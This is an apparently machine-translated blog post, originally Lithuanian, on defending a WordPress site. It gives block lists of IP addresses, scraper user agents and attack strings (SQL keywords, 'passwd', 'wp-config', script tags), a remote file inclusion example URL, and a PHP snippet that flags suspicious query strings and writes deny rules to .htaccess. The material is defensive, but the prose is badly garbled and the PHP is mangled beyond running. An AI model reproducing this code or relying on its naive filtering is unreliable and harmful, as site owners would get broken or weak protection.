A propos du blog ..

L'Internet - mon pain. C'est ce que bloguer: comment faire l'argent en ligne et comment devenir une conquérants Web de meilleure qualité et des sujets connexes - SEO, publicité sur Internet, l'efficacité, la productivité, et une variété de substance mignonne pour aider votre travail plus efficacement.

Et moi ...

Ceci est un blog de quelqu'un qui reçoit 100% du revenu de l'Internet. Si vous savez des choses plus ou plus récent, n'hésitez pas à commenter.

Il est nécessaire de blog et de la sécurité Web

Vous savez probablement que dans de nombreux cas, les pages web ou des blogs d'essayer de pirater, gâcher, contaminer de nombreux vides de sens les commentaires anonymes automatiquement, en utilisant des scripts. Bien sûr, assez souvent s'applique en mode manuel Vous n'avez pas idée de ce que d'un nombre assez impressionnant cas Abies, une méthode de défense est vraiment -.. Vérifier les demandes, et les paramètres IP d'autres envoyés à l'malfaiteur, et de les bloquer. Il suffit d'utiliser mes méthodes proposées, non seulement pour se défendre, mais aussi pour découvrir dans quelle mesure et à quelle fréquence vous attaquez. En savoir plus ...


Blog protection

Bien que le répertoire fournit un "manuel" façon d'utiliser Wordpress est une protection spéciale qui permet pour un site plus sûr et plus propre - Plugin sécurité TimesToCome . Après avoir installé ce plugin va ajouter des paramètres de sécurité. Personnellement, j'utilise l'adresse IP suivante bloquée, l'agent utilisateur et des enquêtes - une partie de la raison, comme vous avez attrapé le spectacle ici (vous pouvez également utiliser vos dossiers). Et même si vous pouvez le voir, même dans Firefox, Internet Explorer - elle est souvent appelée bots.

Avertissement. Nepriisiimu toute responsabilité pour fournies ici ont bloqué la propriété intellectuelle, l'agent utilisateur, requêtes, laissez chaque visiteur de décider si un dossier est approprié.

IP bloquée:
(Ceci est votre liste d'adresses IP bannies :)
User Agents bloqués
(Ceci est votre liste d'agents banni)
Demandes bloquées
(Ceci est votre liste noire demande)

12.192.82.221
121.151.44.115
121.209.51.58
122133106125
123.224.54.112
124.59.113.24
125.141.64.124
128.163.2.43
131.220.64.240
137.48.217.20
142165135180
150.187.25.20
151.13.233.147
158.109.36.140
160.99.12.231
189104241248
190.183.61.18
190.196.2.205
190.196.5.189
193171110146
193.207.106.54
193.253.223.90
193.41.90.11
193.64.244.176
194.165.49.171
194219192251
194.244.39.57
195234106106
195.47.9.2
200.203.121.1
200.49.155.60
201.8.240.141
201.9.129.198
202.47.4.161
203.88.114.169
208.116.39.133
209.12.244.192
209.172.33.53
209195110123
209216249151
209.240.239.2
211.45.156.100
212.34.184.239
212.85.146.235
213.203.223.25
213.91.210.194
216.206.238.35
216.246.228.87
216.82.211.137
217198149178
217.64.177.199
218.186.13.3
218.234.19.139
219104211129
220.86.116.174
221.153.3.136
222.122.179.42
222.164.209.65
222.96.185.28
24.109.59.229
24.200.137.142 124.179.227.139
24.66.10.194
38.117.65.239
58.177.86.197
59.11.15.187 91.121.87.84
60.52.22.176
61.47.10.168
62.103.159.31
62128242180
62193211155
62.75.185.209
62.80.243.201
63.247.43.250
64.15.155.201
64185237191
64.21.98.196
64.246.187.54
65.254.54.218
65.254.63.210
65.95.110.16
65.95.153.184
65.98.67.106
66.135.41.76
66.98.244.93
67.15.48.60
67.18.29.218
67.202.60.246
67.219.69.45
67.68.20.251
67.70.127.164
67.71.176.187
68.147.159.38
69.128.204.74
69.14.152.152
69.157.22.63
69.159.63.161
69.94.120.198
70.85.201.66
70.86.30.82
70.87.240.50
71.101.46.11
71121104178
71.43.15.172
72.233.69.58
72.29.77.72
72.49.255.51
72.55.131.17
72.69.137.26
74.210.176.55
74.6.17.188
75125143162
76.66.125.33
76.68.22.147
76.71.160.65
77189155254
77203192230
78.111.68.37
78.130.75.90
78164157213
78.42.74.174
79133236143
79.136.97.34
79.66.133.114
79.76.213.251
80.146.78.213
80.218.173.93
80233176183
80.53.133.106
81.2.200.22
82.194.67.123
82.225.55.136
82.37.19.52
82.98.141.70
83.160.222.29
83.17.224.250
83240164232
83.65.47.4
83.81.61.72
84.165.87.140
84.72.120.152
85114140133
85157139109
85.171.82.87
85192189233
85.235.40.30
85.25.10.95
85.96.215.53
86.1.196.79
86109167160
86.109.96.134
86145194229
87.101.4.49
87106222144
87.234.201.76
87.61.174.29
88.119.99.10
88.214.192.29
88.223.50.146
88.244.162.64
88.252.145.65
88252149114
89.111.173.68
89.42.133.2
91121204165
91.186.11.35
91.84.19.133
91.89.198.178
92.233.76.213
92.4.112.196 64233183. * 61.103.33.48
92.61.36.98
96.247.65.124

AnotherBot
botpaidtoclick
Cliquez Bot
cr4nk
PR 5.3
DataCha0s
discobot
EBM-POMME
EmailSearch
EmailSiphon
FAST ESP Retriever document
Firefox 2.0
Ginxbot
GrubNG
gvfs
HTTrack
Incutio
Indy Library
Internet Explorer
Internet Ninja
Java
JetBrains
libcurl
libwww-perl
Lwp-request
LWP-triviale
Macintosh; I; PPC
Microsoft Data Access
MJ12bot
Morpheus Enfoncer Scanner
Mozilla Firefox 5.0
Mozilla/4.0 (compatible
Mozilla/4.08
Mozilla/4.61 (Macintosh
Mozilla/5/0 (compatible
Mozilla/7.0
Mozilla / 8
Mozilla / Firefox
Mp3Bot
MSIE6
NIPGCrawler
PEAR
PECL
PHPot
Découvrez fournisseur Protocole
PuxaRapido
Pycurl
Python-urllib
Alors que la sécurité
Sniper site
SkyGrid
Sogou
sun4m
Lever du soleil
syncrisis
topicblogs
User-Agent
W3CRobot
W: PACBHO60
Web Scraper ::
WebDav
WebRipper
Wget
window.location
Winnie Poh
www.ranks.nl
X12R1
Xerka-bot

$ _GET
(Java | v)
. Gif?
. Jpg?
. Txt?
. Xml?
</ Script>
<SCRIPT>
? Page_id = http% 3A% 2F% 2F
admin-ajax.php?
admin-function.php?
ASCII
board.php? voir ftp =
CAST
com_jd-wp
CONCAT
DECLARE
SUPPRIMER
formmail
includedir =
index.php? template =
INSERT
LWP-triviale
OPTIONS
passwd
PATH =
POST / xmlrpc.php
PROPFIND
inscrire + + + +
SELECT
sidebar.php?
UNION
MISE À JOUR
Parole-tube-button.php?
wp-config
wp-login.php? action = http% 3A% 2F% 2F
wp-table-button.php?
WP-trackback.php?
x-aaaaaaaaa

Qu'est-ce que la requête et pourquoi ils ont besoin pour bloquer? Disons que votre site est une échappatoire ou simplement supposé l'horizon papuolėte offensive (mais souvent juste en attaquant les requêtes offensives dans une rangée).

Supposons qu'un sidebar.php des fichiers non sûrs passé les requêtes variables sidebar.php VARIABLES? VARIABLE = http://www.kompiuteriszombis.com/botas.txt, votre serveur sera exécuté le script botas.txt, et vous pouvez dire, dans la plupart des cas, votre serveur est déjà piraté.

Sécurité du site.

Si vous avez un site web, vous pouvez utiliser ce script, vous devez l'enregistrer sur votre index.php, et changer nemapirškite email@email.com dans votre email. email

/ ******************************* ANTIHACK DEBUT **************** ************** /

/ / Vérifier l'injection
$ Req = $ _SERVER ['REQUEST_URI'];
$ Cadena = explode (, $ req "?");
$ De $ de Mi_url = Cadena [0];
$ $ = Restaurants Cadena [1];

/ / Ici vous pouvez mettre vos chaînes soupçons à votre volonté. Faites juste attention de
/ / Coïncidences pas demander à votre URL avec des variables et des paramètres
Inyecc $ = '/ script | http | <|> |% 3c |% 3e | SELECT | UNION | MISE À JOUR | exe | exec | INSERT | tmp / i';

/ / Détection
if (preg_match (inyecc $, $ resto) &&! $ _REQUEST ['FullURL']) {

/ / Faire quelque chose, dans l'exemple envoyer une alerte e-mail à l'administrateur
/ / $ Ip = $ _SERVER ["HTTP_CLIENT_IP"];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
= $ Transmises $ _SERVER ['HTTP_X_FORWARDED_FOR'];
$ $ = RemoteAddress _SERVER ["REMOTE_ADDR"];

$ Message = attaque par injection "dans mi_url $ \ n \ nchain: $ resto \ n \ n
De: (IP-forwa-RA): - $ ip - $ transmis - RemoteAddress $ \ n \ n
--- Fin ------- ";
Email ( email@email.com , «attaque par injection", $ message,
"De:" info @ {$ _SERVER ['SERVER_NAME']} ","-fwebmaster @ {$ _SERVER ['SERVER_NAME']} ");

# # # # Uzbaninam trop. Htaccess
$ Fh = fopen ('htaccess.', 'A') or die ("Impossible d'ouvrir le fichier.");
$ PourÉcrire = "\ n # $ RemoteAddress - $ Reste";
$ PourÉcrire = "\ Ndeny de $ ip \ n".;
fwrite ($ fh, $ pourÉcrire);

fclose ($ fh);

# # # #

/ / Tuer le message et l'exécution
'url illégale »d'écho;
die ();
}
/ ******************************* FIN ANTIHACK **************** ************** /

Un commentaire que «Il est un blog et de la protection Web

  1. Sergey 'Zaza Kuraki a écrit:

    Pour un tel il ya longtemps dalikams Apache mod_security est créée - je n'ai pas besoin de réinventer la roue.

    En ce qui concerne preg'o - n'a pas été mentionné dans "ftp" protocole de requête "Supprimer SQL. A également examiné non seulement la requête, mais les noms de variables - de sorte avant d'utiliser ce code, chacun doit le considérer comme significatif que l'utilisation

    Beja, l'injection SQL peut être fait et sur la gauche de la "?" Adresse Eančia.

    Si le code du système est tordu - il suffit de requête GET ne sera pas une protection suffisante, ont besoin de filtrer les messages et les cookies.

    Il serait beaucoup plus agréable à voir les commentaires de code lituaniens partout, pas seulement dans certains endroits.

    Eh bien, les certificats pour le fichier htaccess -. Pas le plus sûr d'occupation. Bien sûr, tout dépend sur le système hôte.

Laissez votre commentaire

S'abonner au flux Travailler en ligne Les paiements mobiles par Fortumo
  • CATÉGORIES

  • NOUVELLES

    Commentaire

    Nouveaux commentaires

    MES PARTENAIRES

  • Brièvement

    • Lutte d'affaires

      Voici encore un autre combat public: certains ne savent pas lire avant toute balsas.lt MIKUCKI Manto . Soit dit en passant, marchant dans la cafétéria, sans frais, divisé par les journaux, à mon avis, de faire des chapeaux en papier, en vertu de appartement au rez-de réparation de tuiles où le film malheureux, la production de masse de masques de Mardi Gras et de tuer, quand il a vu l'un d'eux, week-end basas.lt semble couvrir tout neapspjoviau - tels la subjectivité journa courage être jaloux! Mantas, nous sommes avec vous. Vous les points forts.

    • Un autre filtre de spam mondial

      Si vous ne voulez pas que filtrer les spams, mais aussi d'annoncer qu'elle est un spam n'est pas un service global - bohuno.com que toute structuration de données utilisateur, tandis que d'autres utilisateurs ont l'e-mail est marqué spam. Fonctionne avec une variété de systèmes, et la plupart des clients e-mail.

    • Excellente compression CSS

      Vous pouvez toujours compresser votre failiuką CSS avec cet excellent outil . La vérité, cependant, faire une copie avant - bien compressé à 20%, un très gros fichier peut faire des erreurs.

    • Un autre spammeurs?

      Dans toute la bande des spammeurs begėdžių lituaniens, adoucir les lois de la Lituanie, et il ya une autre - Cinamon . Il ne serait pas en colère si vous lisez des courriels et faire des ...

    • Est-ce que votre site été piraté?

      Récemment, un de son site abandonné, j'ai découvert les liens pirates qui apparaissent uniquement sur Google et Yahoo search robots. Voulez-vous vérifier si votre site est la source? Tapez dans Google: site: viagra jusutinklapis.lt :)

    • Pas un bon IE6

      Le fait, comment le mauvais IE6, montre les excellents sélecteurs CSS, les attributs, les pseudo palygjimas des classes .

    • Une autre promotion pour acheter en ligne

      En plus d'offrir d'acheter moins cher , est apparu en offrant d'acheter en ligne . Ceci est un autre e-mail. magasin, il semble très bien connecté avec Acme - au moins autant de la pensée après avoir vu le fond de mots-clés du site. Il est bon et offre de paiement via Paypal. Qui va essayer d'abord?

    • Les utilisateurs de portables Google, Evernote vous attend

      Cher utilisateur Google Bloc-notes, vous savez probablement que Google met fin à l'appui Google Bloc-notes. En ligne des commentaires d'excellents services de stockage en ligne et des programmes mis en place une combinaison d'Evernote, un outil permettant suimportuoti tous les messages à Evernote.

  • Traducteur

    Lithuanian flagItalian flagKorean flagChinese (Simplified) flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flag
    By N2H